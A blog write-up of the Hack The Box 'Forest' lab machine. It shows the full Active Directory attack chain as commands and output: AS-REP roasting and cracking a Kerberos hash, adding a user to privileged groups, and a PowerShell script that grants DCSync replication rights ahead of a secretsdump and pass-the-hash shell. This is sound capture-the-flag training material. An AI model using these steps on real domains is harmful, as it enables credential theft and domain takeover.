Hack The Box - Forest Writeup

System Information

 



Initial Enumeration


It is a windows machine so we start using enum4linux

Domain name: HTB

Users:    
  • andy (Andy hislip)
  • lucinda (Lucinda Berger)
  • sebastien (Sebastien Caron)
  • mark (Mark Brandt)
  • santi (Santi Rodriguez)
  • ezra
  • Svc-alfresco


After some checks we can discover that svc-alfresco doesn't require Kerberos pre-authentication and therefore we can use a script from Impacket named GetNPUsers.py.
This scripts returns a TGT for the user even without knowing the password

# ./GetNPUsers.py  -request  -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB:6ef6ed7aa0a1631bff934f7cb4d7c249$fd4916b0e01b015a70baf77bc823f2cfb9d70c532831526fff1c40c9b491d9b5ddabcca85e14ebe4a62dca792960b922ebd8e8f63c9aed90812fd958eb204b74cb6f865cbdd792b910dc72754f2fa29a96b3f0580066a4e7f2e0e0dddcc500aa1aaa43b9d64f7cc9f9bdbfcbadd9841ff99c45aa0f6e73db7d4fc323f70a53d935a7327d1a60c1b1f30fdde10d7bf5387647243057f8c29cdd8778dae2a6f9df359d79c619c172fb4a59b8a65eeec5b42db0bbd02dcd3441eb3957f4e749dce8cf9990e7090009d0a6c0ce34729c3309e53dc6b0a1eac2209c3ffe0b4adc474d

The output $krb5asrep.... is compatbile with John and we can decrypt it with rockyou wordlist:

# john --wordlist=../../rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:11 24.38% (ETA: 03:58:12) 0g/s 334503p/s 334503c/s 334503C/s smf1180..smf,727
s3rvice          ($krb5asrep$23$svc-alfresco@HTB)
1g 0:00:00:12 DONE (2019-11-04 03:57) 0.08176g/s 334072p/s 334072c/s 334072C/s s3s1k2..s3rj12
Use the "--show" option to display all of the cracked passwords reliably
Session completed

# john --show hash.txt
$krb5asrep$23$svc-alfresco@HTB:s3rvice

1 password hash cracked, 0 left

This gives us a password  s3rvice

We can discover shares using this account:

smbclient -L 10.10.10.161 -U "htb/svc-alfresco"
Enter HTB\svc-alfresco's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)

Failed to connect with SMB1 -- no workgroup available


Initial Foothold & User Flag


We can use WinRM to get access as svc-alfresco:

We can navigate to desktop and get the user flag:




Root Flag


Doing further enumeration we can discover that svc-alfresco user can add new user and also add them to some groups, like "Exchange Windows Permissions"
So I created and added a standard user.


net user nik Nik-1234 /add
net group "Exchange Windows Permissions" nik /ADD /DOMAIN
net localgroup "Remote Management Users" nik /ADD


Once logged as the new user with WinRM I used Sharphound to get all the information regarding Active directory and found a possible path to domain admins:



It seems that there is a path from my user to HTB.local domain using the permission Exchange Windows Permissions
This is explained in:
https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/DomainObject.md

I used a command sequence:

$acl = get-acl "ad:DC=htb,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType

$acl.AddAccessRule($ace)

 Now the user nik has extended rights on the AD domain named Ds-Replication-Get-Changes-All (this means that this user can be used to replicate AD information, which also means that it has the rights to read all information from the AD domain) 
Then we can go back to impacket and used secretsdump to dump all hashes and tickets:

We don't need to crack any hash, we just can reuse the administrator hash with the wmiexec.py tool of impacket and get a shell:

And also the root flag
  


By -

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)